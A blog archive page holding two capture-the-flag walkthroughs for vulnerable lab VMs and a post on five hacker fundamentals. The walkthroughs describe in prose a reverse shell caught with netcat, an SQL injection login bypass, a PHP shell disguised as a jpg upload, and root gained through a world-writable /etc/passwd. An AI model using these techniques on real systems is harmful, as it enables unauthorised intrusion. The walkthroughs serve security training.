<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkaFpr5ferO293WNDY2qHniZaCbDDErrWLguBnH2g4n0s5-5nnj8jvz6R3cpWdpopAU_AmMWPWNdsw8aaIzFVj585L_OMwU9sJZfglFat1uN-ZydzXyMoQPJv9yaHAbe84sex-3365aaO/s1600/sopel_directory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkaFpr5ferO293WNDY2qHniZaCbDDErrWLguBnH2g4n0s5-5nnj8jvz6R3cpWdpopAU_AmMWPWNdsw8aaIzFVj585L_OMwU9sJZfglFat1uN-ZydzXyMoQPJv9yaHAbe84sex-3365aaO/s320/sopel_directory.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Looking in the modules directory we find a run.py module. It seems to allow us to run commands in the irc chat, but only if we're Waldo. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNo9-1-8vBPVf0jlY9oMPFNrlLz7UF1ywj80UdRKe8JM5qYE_gnLqBHiAXGzE5LOMdRm-3Evr4VoxGflbKA2tUKTEizi_oprkl6LFBsTKyllKHHy-zyTHbR6jHHPzuQv7nLmKpnBCYLxqG/s1600/run_py.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNo9-1-8vBPVf0jlY9oMPFNrlLz7UF1ywj80UdRKe8JM5qYE_gnLqBHiAXGzE5LOMdRm-3Evr4VoxGflbKA2tUKTEizi_oprkl6LFBsTKyllKHHy-zyTHbR6jHHPzuQv7nLmKpnBCYLxqG/s320/run_py.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
As expected, we're not waldo and we aren't able to run commands. I apologize for the next section, I went through without taking screenshots so, you'll have to excuse the lack of pictures while I explain what needed to be done to be able to be waldo.<br />
<br />
If you recall from the sudo listing, we could access iptables, but we could also access vim with a certain document. The certain document is important to allow anyone to use the sudo command, but there is nothing in the document we need to change. Vim has a feature that allows us to execute commands using :!<command>. So, we find the process that is running tmux from the irssi.sh script and we kill it. I believe it was 790, but don't quote me on it. After we kill that process, we are able to change our nickname on the irc chat to waldo and thus run commands.<br />
<br />
Here we can see that the .run command worked in the irc chat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_L8Mcqu4bs4bUfKP4Kjwr_JiEP6pbO2NUBUvhU5sgLc92OHFDIKxm8PssJ4K7OjgAQJ1q7wwhN2w6Dnt7p6xvCfN2FAsCTDuJeMuT0G3nEe0O5SIrnhUQ6baoZ-uX4NXHX_SYLiqHpjvr/s1600/run_as_waldo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_L8Mcqu4bs4bUfKP4Kjwr_JiEP6pbO2NUBUvhU5sgLc92OHFDIKxm8PssJ4K7OjgAQJ1q7wwhN2w6Dnt7p6xvCfN2FAsCTDuJeMuT0G3nEe0O5SIrnhUQ6baoZ-uX4NXHX_SYLiqHpjvr/s320/run_as_waldo.png" width="320" /></a></div>
<br />
Next we set up a local listener and use the python reverse shell to get a shell on the box as wallaby. We simply put the python command in the irc chat and catch the reverse shell connection with netcat and we're good to go!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifAX9QnjOgBx_snqgbGAIX5JnW0CZw-1BSXZ5Yfsn6vkC972BNzF0g2befd1XHVDuGPrSyf841NTBPwy4yRLfnLjUCPYRCcJ-0_WkctFKGqYap2ap2VCtEb3z3pCERdQGa9tXdM2sY_B0a/s1600/shell_as_wallaby.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifAX9QnjOgBx_snqgbGAIX5JnW0CZw-1BSXZ5Yfsn6vkC972BNzF0g2befd1XHVDuGPrSyf841NTBPwy4yRLfnLjUCPYRCcJ-0_WkctFKGqYap2ap2VCtEb3z3pCERdQGa9tXdM2sY_B0a/s320/shell_as_wallaby.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Sudo seems to be part of this challenge so let's check the sudo permissions as wallaby.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2xAOe6okzl-eDulmZskrn9RP3-91FqclH_sq-N9gnlTaAE5TgwqxlSPRw8OuFfqJ7VjO9-HbbOcXyNVU3pKEXP8ZkS5oUeWPKl6ylwFF9_m_eiXyAygFBVTB7i49i8KDAk8-jHoM0wxf/s1600/sudo_everything_as_wallaby.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2xAOe6okzl-eDulmZskrn9RP3-91FqclH_sq-N9gnlTaAE5TgwqxlSPRw8OuFfqJ7VjO9-HbbOcXyNVU3pKEXP8ZkS5oUeWPKl6ylwFF9_m_eiXyAygFBVTB7i49i8KDAk8-jHoM0wxf/s320/sudo_everything_as_wallaby.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Wallaby can use sudo with no password to do anything it wants, so we are basically done! We run one command to officially get us root and we can cat the flag. We run 'sudo su root' and enjoy our new root shell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiLJ9pkXLvRCSCorpEzctUeqUUwJB9n1ZfYsSo1j8VQDcjbfS_08NbSYnc8U5JDuszhHnkINx_ytFrvTND9rNQGNecb9qynhBOUw2w6ip-_awmE8YWyrPSHdjvr1YSdTweSi5xi9Z7svK/s1600/root_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiLJ9pkXLvRCSCorpEzctUeqUUwJB9n1ZfYsSo1j8VQDcjbfS_08NbSYnc8U5JDuszhHnkINx_ytFrvTND9rNQGNecb9qynhBOUw2w6ip-_awmE8YWyrPSHdjvr1YSdTweSi5xi9Z7svK/s320/root_shell.png" width="320" /></a></div>
<br />
Now with our root shell, we cd to /root and cat the flag.txt and thus we are done!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxRVWQ9XBs0rtnF3F9kZmBnChcMD3Idl466XShI2BaKWO4kB3xHMKMH2Qp0Uv81g-hpYmNHdMDN3rxQJbXFDtdn24Rdt0sot1Z_CZM-xGhAVEXihAMy6n9Ork9ZzL0YKREVNOAfMWtHEr/s1600/flag_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxRVWQ9XBs0rtnF3F9kZmBnChcMD3Idl466XShI2BaKWO4kB3xHMKMH2Qp0Uv81g-hpYmNHdMDN3rxQJbXFDtdn24Rdt0sot1Z_CZM-xGhAVEXihAMy6n9Ork9ZzL0YKREVNOAfMWtHEr/s320/flag_txt.png" width="320" /></a></div>
<br />
This was a fun challenge and I really like the use of IRC to facilitate the privilege escalation. Thanks for writing it and I look forward to the second part!Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com1tag:blogger.com,1999:blog-918525977206186619.post-38378228229613150692017-01-15T16:34:00.000-05:002017-01-15T16:34:29.069-05:005 Fundamentals Every Hacker Must MasterWelcome to the new year! 2017 = 0x7E1 = 0111 1110 0001, just in case you were curious. So today, I wanted to discuss 5 fundamental skills that every hacker should master. I use the term hacker loosely because these apply to both offensive and defensive experts alike. I'm going to count down in reverse order, ready?<br />
<br />
5. Port Scanning<br />
<br />
This is the bread-and-butter of compromising a computer. After you have completed your information gathering phase and determined which computers are 'in-scope' for your purposes then you need to figure out where the weak points of the computer are. Hint: it's the open ports. Ports can tell us so much about the computer we may not have gathered during the previous phase like, which operating system is running? which services are running? and sometimes tell us the overall use of that specific computer (Mail server, DNS server, employee desktop, etc.). Being able to scan ports effectively, quickly, and quietly is the BEST way to attack a computer. On the defensive side, making sure only the services you need running are running, making sure the services are up-to-date including patches if previous vulnerabilities were discovered, and being able to detect network scanning is paramount for the defense. NMAP is the big name in port scanning, but you should become familiar with other port scanning tools such as unicornscan, masscan, p0f, Angry IP Scanner, and hping3 as a couple of examples.<br />
<br />
4. Networking Models<br />
<br />
In general, networking models are an academic exercise, but they do serve one purpose while learning; a complete understanding of the interchange of information between computers. The Department of Defense (DoD) model is the most useful in my opinion. It has four layers (Network Access Layer, Internet Layer, Host-to-Host Layer, and Application Layer). The first layer (Network Access) takes into account the physical exchange of information across wires or via a wireless medium along with the transition from physical to virtual information. The next layer (Internet) is what connects computers together across the internet. The IP protocol is most commonly used nowadays and in order to use the IP protocol, IP addresses are assigned to each computer and routers are used to send information from one network to a new network based on IP addresses. The third layer (Host-to-Host) is about which language is used by each computer to communicate. There are two main options (TCP and UDP) and they can be likened to a civil conversation and a stock market trading floor. TCP is session-oriented and has reliable transmission so information is communicated effectively and completely at the expense of speed. UDP is almost the exact opposite, it yells things across the internet hoping the correct computer hears it and responds appropriately. Lastly, we have the application layer. This is where HTTP traffic, FTP traffic, SMB traffic, and all other types of application send data over TCP or UDP over IP (mostly) over wired or wireless mediums from one computer to another. Even if you don't understand the deep technical details of how each layer works, you should be familiar with how these work in general because in order to exploit (offensive) and prevent exploits (defensive) you need to understand how the information is communicated.<br />
<br />
3. Programming from Assembly to Python<br />
<br />
Programming is SO incredibly important! I cannot stress this enough. How are operating systems made? by programming. How are programs/software made? by programming. How are exploits made and used? by programming. Nowadays there are so many different ways to learn how to program from free online classes to free Android/iOS apps to youtube videos. In fact, <a href="https://www.youtube.com/results?search_query=learn+how+to+program" target="_blank">here you go!</a> I recommend learning the basics in a high-level language such as PHP, Java, or C#. Once you have mastered one of those languages move to Python because you will be using this language A LOT. Once you've mastered Python drop down to C and assembly. You can spend the rest of your life mastering C and assembly plus, I think they are the least intuitive for people learning to become hackers. If you're already familiar with programming in general focus on Python, C, and assembly. The understanding of these languages are what separates a good hacker from a great hacker.<br />
<br />
If you're a purist or traditionalist, you can certainly go backwards. Start at assembly and understand what an Op Code is and what it does, you'll learn about registers and memory addresses and you can certainly expect your head to hurt afterwards, but everything you learn afterwards is just an abstraction on top of assembly. After assembly, you will learn to appreciate what C can do for you and if it can't do something you need, you can always force assembly upon it! Python will allow you to script things out instead of writing a program and compiling it every time. Use python to augment and script your C and assembly work.<br />
<br />
Full disclosure: I did not recommend every program language that you could use and yes, these are the languages that I am personally biased towards. You could learn Ruby, you could learn Perl, you could learn C++ or ,Net or any other. Each have their benefits and you should be familiar with all of them, but you will end up enjoying a select few languages based on personal preferences.<br />
<br />
2. Information Gathering<br />
<br />
Even though this is the first step in the hacking methodology, it makes number 2 on our list and you'll see why. This step is so critically important because the more information you can gather the more likely you are to accomplish your goals. You need to find domains, IP addresses, email addresses, physical locations, what services they provide, what services the don't provide, can you exploit them technically, socially, or physically? After gathering all this information, the actual hacking becomes laying down one train track after another to connect yourself straight into your target. Lots of people skip this step (including myself sometimes) and later when the individual finally exploits their target, it's as a result of additional information gathering. You can never have too much information especially in this day and age where computers can store and process most of it for you. DO NOT SKIP THIS STEP.<br />
<br />
1. Curiosity<br />
<br />
The single best skill a hacker can have is curiosity. The insatiable desire to learn about the way something works. This is how hackers find zero-day exploits: they know your product better than you do. They learn about your product, study your product, use your product and then exploit your product. This curiosity does not stop at just exploitation. It also extends to offensive, if you're on defense and defense, if you're on offense. The only way to beat the adversary is to understand the adversary better than they understand themselves. If you're on defense you understand how an attacker tries to exploit systems and you harden them. If you're on offense, you understand how defense hardens systems and work around those patches, configurations, and hardening strategies. I would further posit that a true hacker is curious about all things and not simply what he or she knows best. Some of the best findings over the years have come from the intersection of previously unrelated notions, ideas, and fields of study. This skill must be mastered above all else. Be curious and if you're not curious about something, be curious about why you're not curious.<br />
<br />
These are the 5 fundamentals every hacker should master, offensive or defensive. Take these to heart and use them to better yourself.<br />
<br />
-Hack Responsibly, Hack Professionally.<br />
<br />
<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com1tag:blogger.com,1999:blog-918525977206186619.post-26478653923532745892017-01-14T00:11:00.000-05:002017-01-14T00:11:13.103-05:00Hackday: Albania WalkthroughHere we are for a walkthrough of the Hackday: Albania and after booting it up in VirtualBox, I ran an NMAP scan that listed only port 22 open and a web server on port 8008. So when we browse to the webserver we are greeted with Mr. Robot...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHjvsAosjdDIa_C5J8kwbubk5U2XIhBemPCKD-UNqcOQavctcIyVSYjgyabQhBVW54CK5jiowHUfqgYjY3iLGhp4bda3qPFAL5C_MHoPBvOssfrdUtl9BIoluDy4ZhflAbq9Hqo5OYZryq/s1600/webpage_home.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHjvsAosjdDIa_C5J8kwbubk5U2XIhBemPCKD-UNqcOQavctcIyVSYjgyabQhBVW54CK5jiowHUfqgYjY3iLGhp4bda3qPFAL5C_MHoPBvOssfrdUtl9BIoluDy4ZhflAbq9Hqo5OYZryq/s320/webpage_home.png" width="320" /></a></div>
I have no idea which language that is or what is says so throwing it in google translate gives us: "If I am, I know where to go," and it is in Albanian. Cool.<br />
<br />
So, I check the source and there is a comment and I throw that into google translate as well, "Ok, Ok, but not here." Ok, the website is trolling me, ass. So I don't see anything useful from the source so I use dirbuster to see if there is anything else on this server. So, something came back a /js/ directory so I navigated to the page and found this...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiUSUxgAFkhtyqUUbPedCHWL9SkDYq_NTvFCKl2sHsToGGlJT2D3sr3Tv43a8khAeKW5Xc-qVV94OsVWZ9ZFl8p6jZ3qdPZkbZTYD4R4Inq16j_wrMNdwEyG3aMVlNx0TiwXmZ3ys3UX7/s1600/raptor_page_troll.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiUSUxgAFkhtyqUUbPedCHWL9SkDYq_NTvFCKl2sHsToGGlJT2D3sr3Tv43a8khAeKW5Xc-qVV94OsVWZ9ZFl8p6jZ3qdPZkbZTYD4R4Inq16j_wrMNdwEyG3aMVlNx0TiwXmZ3ys3UX7/s320/raptor_page_troll.png" width="320" /></a></div>
The translation is loosely, "Is it right or is directory jerk." So, since /js/ is a directory, I decide to recurse on the /js/ directory with dirbuster and I find /js/external, /js/images/. /js/external has a directory /jquery/ which contains jquery.js and seems to be the external version of the jquery.js file if needed. /js/images has a list of icon sets in different colors. Could be something, but i'm not sure at this point. At this point, I'm kind of stuck so I decide to use another scanner, Nikto, and holy crap things appeared! Why? robots.txt. So I pulled it up on the web server...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6giPnaUpFoNgMGSSlovNa5t4w05gmLk7tUpjHspyInOQv2LdK5dR8ewt_zqPW67rB20YZRlkXqOSf0YzjeJk52PGcCL8JWiCI-7oeyV-KVD-5fmkr6YS7memUme_WwYBc0Ug_8K8fCmRo/s1600/robots_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6giPnaUpFoNgMGSSlovNa5t4w05gmLk7tUpjHspyInOQv2LdK5dR8ewt_zqPW67rB20YZRlkXqOSf0YzjeJk52PGcCL8JWiCI-7oeyV-KVD-5fmkr6YS7memUme_WwYBc0Ug_8K8fCmRo/s320/robots_txt.png" width="320" /></a></div>
<br />
A bunch of directories have been disallowed by the robots.txt file, however none of them are trivial to manually type, so I want to find a tool to that will scan these for me. I tried dirbuster and ZAP, but none seemed to do searches based off the robots.txt file. So, I google around and found wfuzz which seemed to do the trick. I had never used wfuzz before, so I fumbled through the usage and eventually saw this on the help file...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0jC1vlDYdNJiUMOJT4bED-GgxUvysskw6gk0P3qP3eVhsF63F9FLaDrfFp-AmksBGy51S_1Fl73FWXjOlM4OgFQ0txpts6Fr8AV5XN0KI-9-6B4sy86X7O26SlH8EHeGvsoacWCIahYQ_/s1600/wfuzz_howto.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0jC1vlDYdNJiUMOJT4bED-GgxUvysskw6gk0P3qP3eVhsF63F9FLaDrfFp-AmksBGy51S_1Fl73FWXjOlM4OgFQ0txpts6Fr8AV5XN0KI-9-6B4sy86X7O26SlH8EHeGvsoacWCIahYQ_/s320/wfuzz_howto.png" width="320" /></a></div>
<br />
Which seemed to be exactly what I wanted (side note: I used wget to get a local copy of the robots.txt file and locally named it robots.txt). Then the results were...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPrIdqxiwSf-n2vuEIyVmNZpFPCjOtAx5FAwzV5_gHMXvWIRU84Y6eX7pxtK4AEsMxCrvCHKAieqbFKDI7P4iKvcId5EQX1_DIcH-vVIfx4kTtV3vy92SbXJaBEwM_6ua23Xxa7IXO4Mfh/s1600/odd_directory_robots_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPrIdqxiwSf-n2vuEIyVmNZpFPCjOtAx5FAwzV5_gHMXvWIRU84Y6eX7pxtK4AEsMxCrvCHKAieqbFKDI7P4iKvcId5EQX1_DIcH-vVIfx4kTtV3vy92SbXJaBEwM_6ua23Xxa7IXO4Mfh/s320/odd_directory_robots_txt.png" width="320" /></a></div>
<br />
This result is weird, so let's look at it. We found a new page!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxT2W2u4OG3V7eJdJhf0qUhBkCSxf0qYehEc9gAs3WP6zlLRH-uFthaQC01yg_Smwr_N3mhq4VViakyTvzAE0_lBSPWY3UUgnTWb7WKOn4mjGAplq_Gka9kC83tAtgmmlw1q27FgjKhx0g/s1600/is_there_vulnbank.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxT2W2u4OG3V7eJdJhf0qUhBkCSxf0qYehEc9gAs3WP6zlLRH-uFthaQC01yg_Smwr_N3mhq4VViakyTvzAE0_lBSPWY3UUgnTWb7WKOn4mjGAplq_Gka9kC83tAtgmmlw1q27FgjKhx0g/s320/is_there_vulnbank.png" width="320" /></a></div>
So I navigated to /uni.../vulnbank and I see there is a client folder in the vulnbank folder. Again, I follow the path and end up at 'Very Secure Bank' client portal. Looks like some SQL injection is next. After trying some naive attempts at SQL injection, I decided that sqlmap would do this faster and better! Soooo here we go...sqlmap didn't give us great results, but username is vulnerable and it did get us the information that the back end database is MySQL. A good thing to know is that MySQL uses '#' as comments instead of '--' like I was using previously. So, I tried some more naive SQL injection attempts. Nothing worked. COME ON!<br />
<br />
Since the username is vulnerable, I figured I'd try and brute force the username with "'#" (single quote, poundsign) appended to the end to trigger the SQL injection vulnerability. I searched kali and google for a good list of usernames and tried some to no avail. Finally, I resorted to the ol' faithful rockyou.txt. It worked. It found jeff and hobson as two users. So I tried both of their usernames appended with '# and they worked!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF2Qwl3pW-DvZquEe4eP8lfge-KxonT0rYI0m-LtuFWes7atEikU7ya1dFbvNXqEgPR2gnCzZGfsc61CRLwsdRwUHQ5wklxoYnJmlfIfE-bSWinEhcCm7M8RGulov8-PcojxlCAOxhdc0W/s1600/hobson_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF2Qwl3pW-DvZquEe4eP8lfge-KxonT0rYI0m-LtuFWes7atEikU7ya1dFbvNXqEgPR2gnCzZGfsc61CRLwsdRwUHQ5wklxoYnJmlfIfE-bSWinEhcCm7M8RGulov8-PcojxlCAOxhdc0W/s320/hobson_username.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZU5GHQBd-akTXpqQzYyb8mMtHbSmVEJ1EiFy7xVu4hsB-_DXm0cU2Fy3x3ECUN4OGXR8P1ANlo5OxXHAIZys8IGR-yapriBSoBGwfgIeYaAcNy4EAAwgSgs8r_zB7iojetcrEltigfAl5/s1600/jeff_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZU5GHQBd-akTXpqQzYyb8mMtHbSmVEJ1EiFy7xVu4hsB-_DXm0cU2Fy3x3ECUN4OGXR8P1ANlo5OxXHAIZys8IGR-yapriBSoBGwfgIeYaAcNy4EAAwgSgs8r_zB7iojetcrEltigfAl5/s320/jeff_username.png" width="320" /></a></div>
<br />
<br />
Ok, there is a submission form on the right side, let's submit a test case and see what happens. Once we submit a test case, we see the message "After we got hacked we our allowing only image files to upload such as jpg, jpeg, bmp etc...". I didn't try and upload an image yet, but obviously I need to try! I'm going to see if I can use the php shell in a jpg trick to get RCE.<br />
<br />
AAAAnd boom! Meterpreter shell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzB-yOaokjtJtFYDMqljDj-vZ9imrVvcXVGXCo7sm1Bge6zbpGRNG4hzjxieiNeI_uszduDKSUcMMWVUMyDBitEr7WRLOXvQGtG5L-IsJOrnGXg8X-PFILgEbMax9hwQG7elSPSs2_ocMw/s1600/create_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzB-yOaokjtJtFYDMqljDj-vZ9imrVvcXVGXCo7sm1Bge6zbpGRNG4hzjxieiNeI_uszduDKSUcMMWVUMyDBitEr7WRLOXvQGtG5L-IsJOrnGXg8X-PFILgEbMax9hwQG7elSPSs2_ocMw/s320/create_payload.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlyOhhIGwfmtLuCkTg30FWQ6RMANZLODgScsVY98WlZqPVgfah2lD7LE3NsdxfYlqODmFKlSDphE7UwKkk3BpRE8LMU1LzveosDUjhTctu0vfJgwmOsvakljqx7JdjBHX0sPJYaYoI5Qc/s1600/meterpreter_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlyOhhIGwfmtLuCkTg30FWQ6RMANZLODgScsVY98WlZqPVgfah2lD7LE3NsdxfYlqODmFKlSDphE7UwKkk3BpRE8LMU1LzveosDUjhTctu0vfJgwmOsvakljqx7JdjBHX0sPJYaYoI5Qc/s320/meterpreter_shell.png" width="320" /></a></div>
<br />
Now that we have a shell, let's do some recon and escalate privs. First, I like to cat /etc/passwd and look for users...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmuQwe7TxhAq9bpIKlU-rEFiUWZ8uPQugVPpQxMC6nR8LE9awTzciNIMZmrYJzT0Trmr9KBADChuGp2znCZGBVFuZSzq_7Z_L3lbprrkBoP8Ahh5Th1KJbaJy_VeWh9_zds6hyvXnVB0Yu/s1600/taviso_user_etc_passwd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmuQwe7TxhAq9bpIKlU-rEFiUWZ8uPQugVPpQxMC6nR8LE9awTzciNIMZmrYJzT0Trmr9KBADChuGp2znCZGBVFuZSzq_7Z_L3lbprrkBoP8Ahh5Th1KJbaJy_VeWh9_zds6hyvXnVB0Yu/s320/taviso_user_etc_passwd.png" width="320" /></a></div>
<br />
So we found 'taviso', I decided to also check which groups he is in (meterpreter shell is not very stable but easily obtainable just by refreshing the ticket page in the web app) so I copied it to my local machine and I see the following...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCULW0uLfINnTSJDazOrU1NzpB15obkKFJBI_EWEUU40Y8q8rfuvrohf6dpRYk6rOSpCYH9xl0yNetXVoH8_swBSpdGu8rz7mjS_erJwyB1tYY8Mcsa3ivZSgherIMc-EurZh9tDdJikCq/s1600/etc_group_taviso_sudo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCULW0uLfINnTSJDazOrU1NzpB15obkKFJBI_EWEUU40Y8q8rfuvrohf6dpRYk6rOSpCYH9xl0yNetXVoH8_swBSpdGu8rz7mjS_erJwyB1tYY8Mcsa3ivZSgherIMc-EurZh9tDdJikCq/s320/etc_group_taviso_sudo.png" width="320" /></a></div>
He's in the sudo group! Awesome! So, continuing my reconnaissance, I realized I overlooked something about the /etc/passwd file...it's world writable. what.<br />
<br />
Well, that makes everything much easier then. I decided to add my own root user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiENDehoZ2EPIHzDsbrwEXIqGFx2Syi-2m2pdtKS-gWiMSPA1LjiKg_meb0TOWhfHS_9l5FcQni3IC7DV3x6qNuxumASjayAkAcARU-kEAL01GsQmo1BEvN1kDPOnzdMbTmGn9Om6bpPq1/s1600/make_new_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiENDehoZ2EPIHzDsbrwEXIqGFx2Syi-2m2pdtKS-gWiMSPA1LjiKg_meb0TOWhfHS_9l5FcQni3IC7DV3x6qNuxumASjayAkAcARU-kEAL01GsQmo1BEvN1kDPOnzdMbTmGn9Om6bpPq1/s320/make_new_password.png" width="320" /></a></div>
First, I created a password....it was 'password' as you can see. Next, I created the new user 'fabio'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWhZWgjxnXm4pOg8h_wVKUpvDZPFLX539ZzNGejKUForRPWsnwPK2ttrz1LzCSelA2c1twq4OA7qsGoUhUui1pyf81MfO2gdk7gAuTGtZF50V8gPFuHr0XKRe7YlYLukyIMIiSn7ImxcG3/s1600/new_etc_passwd_with_fabio.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWhZWgjxnXm4pOg8h_wVKUpvDZPFLX539ZzNGejKUForRPWsnwPK2ttrz1LzCSelA2c1twq4OA7qsGoUhUui1pyf81MfO2gdk7gAuTGtZF50V8gPFuHr0XKRe7YlYLukyIMIiSn7ImxcG3/s320/new_etc_passwd_with_fabio.png" width="320" /></a></div>
Since the file was editable, I simply said 'fabio' had a UID of 0 and a GID of 0, which means root privs!<br />
<br />
Lastly, all I had to do was switch users to fabio...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrsBHo9lfirpWo6L4-bkIM7LuTBfKZnmzGHSYo8CGoIyOn5Iqy_XhU4AfpuG7m4dLCCNa-RvP7dy73G-DD-ebFEiNQQuSlAtNmMxyTAwmdJoWgCvwcRgjyu-Axh-5Wtj3NVscKXrvZsfTg/s1600/have_root_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrsBHo9lfirpWo6L4-bkIM7LuTBfKZnmzGHSYo8CGoIyOn5Iqy_XhU4AfpuG7m4dLCCNa-RvP7dy73G-DD-ebFEiNQQuSlAtNmMxyTAwmdJoWgCvwcRgjyu-Axh-5Wtj3NVscKXrvZsfTg/s320/have_root_shell.png" width="320" /></a></div>
This included getting TTY using python3 on the system. Now that I have root privs, let's finish this challenge.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
